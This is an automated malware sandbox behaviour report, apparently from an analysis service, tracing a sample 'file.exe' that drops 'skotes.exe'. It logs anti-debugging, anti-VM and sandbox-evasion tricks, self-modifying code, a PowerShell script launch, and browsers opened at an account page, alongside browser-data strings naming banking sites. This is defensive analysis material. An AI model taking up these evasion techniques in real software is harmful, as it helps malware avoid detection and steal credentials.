Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0A0F second address: 4CA0A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0A27 second address: 4CA0A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d jmp 00007F075D128F06h 0x00000012 je 00007F07CF39E849h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pop eax 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0A5F second address: 4CA0A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0A63 second address: 4CA0ABE instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test byte ptr [76FA6968h], 00000002h 0x0000000f pushad 0x00000010 push ebx 0x00000011 mov edx, ecx 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F075D128EFBh 0x0000001a sub cl, 0000001Eh 0x0000001d jmp 00007F075D128F09h 0x00000022 popfd 0x00000023 popad 0x00000024 jne 00007F07CF39E80Bh 0x0000002a jmp 00007F075D128EFEh 0x0000002f mov edx, dword ptr [ebp+0Ch] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0ABE second address: 4CA0AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 37E99E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 523A68 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 54BD6A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 52DA0C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5B58B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F2E99E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10D3A68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10FBD6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10DDA0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11658B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D20E78 rdtsc 0_2_04D20E78
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8187
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1372
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5368 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5368 Thread sleep time: -120060s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7164 Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7164 Thread sleep time: -106053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1488 Thread sleep count: 380 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1488 Thread sleep time: -11400000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6516 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7152 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7152 Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1020 Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1020 Thread sleep time: -100050s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7120 Thread sleep count: 85 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7120 Thread sleep time: -170085s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1488 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2072 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4144 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWfe
Source: Web Data.17.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: global block list test formVMware20,11696428655
Source: skotes.exe, 00000006.00000002.3278202583.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3278202583.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3298502123.0000029748A54000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2906000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3293759205.0000029D56500000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3283028567.0000029D55F6A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3282652339.000002B9C28BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3292242787.000002B9C3210000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291115405.000001F42CEF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000010.00000002.3308379802.000001A8B289F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3292128593.0000029D56416000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: Web Data.17.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000016.00000002.3293759205.0000029D56500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: firefox.exe, 00000010.00000002.3304423656.000001A8A841A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3029532362.000001A8A8425000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.17.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 0000000C.00000002.3290216462.000002974342B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPn
Source: Web Data.17.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Web Data.17.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: firefox.exe, 0000001F.00000002.3283065677.000001F42CAEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0:
Source: Web Data.17.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000006.00000002.3283455170.00000000010B6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Web Data.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000007.00000002.2976001217.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSFT_NetEventVmNetworkAdatper.format.ps1xmltN
Source: Web Data.17.dr Binary or memory string: discord.comVMware20,11696428655f
Source: firefox.exe, 00000016.00000002.3283028567.0000029D55F6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: Web Data.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.17.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Web Data.17.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.17.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.17.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000010.00000002.3309155779.000001A8B2906000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3293759205.0000029D56500000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3292242787.000002B9C3210000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Web Data.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.17.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.17.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: firefox.exe, 0000001A.00000002.3292242787.000002B9C3210000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
Source: powershell.exe, 00000007.00000002.3065418302.0000000007576000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Web Data.17.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.17.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2083028111.0000000000506000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2120676594.00000000010B6000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2123277356.00000000010B6000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3283455170.00000000010B6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: powershell.exe, 00000007.00000002.2976001217.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSFT_NetEventVmNetworkAdatper.cdxmlDn
Source: Web Data.17.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: firefox.exe, 00000016.00000002.3293759205.0000029D56500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D20E78 rdtsc 0_2_04D20E78
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EF652B mov eax, dword ptr fs:[00000030h] 6_2_00EF652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EFA302 mov eax, dword ptr fs:[00000030h] 6_2_00EFA302
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1008615041\KQGBYWk.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: file.exe, 00000000.00000002.2083028111.0000000000506000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2120676594.00000000010B6000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2123277356.00000000010B6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: o8`[0Program Manager
Source: skotes.exe, skotes.exe, 00000006.00000002.3283455170.00000000010B6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 8`[0Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EDD3E2 cpuid 6_2_00EDD3E2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008615041\KQGBYWk.ps1 VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
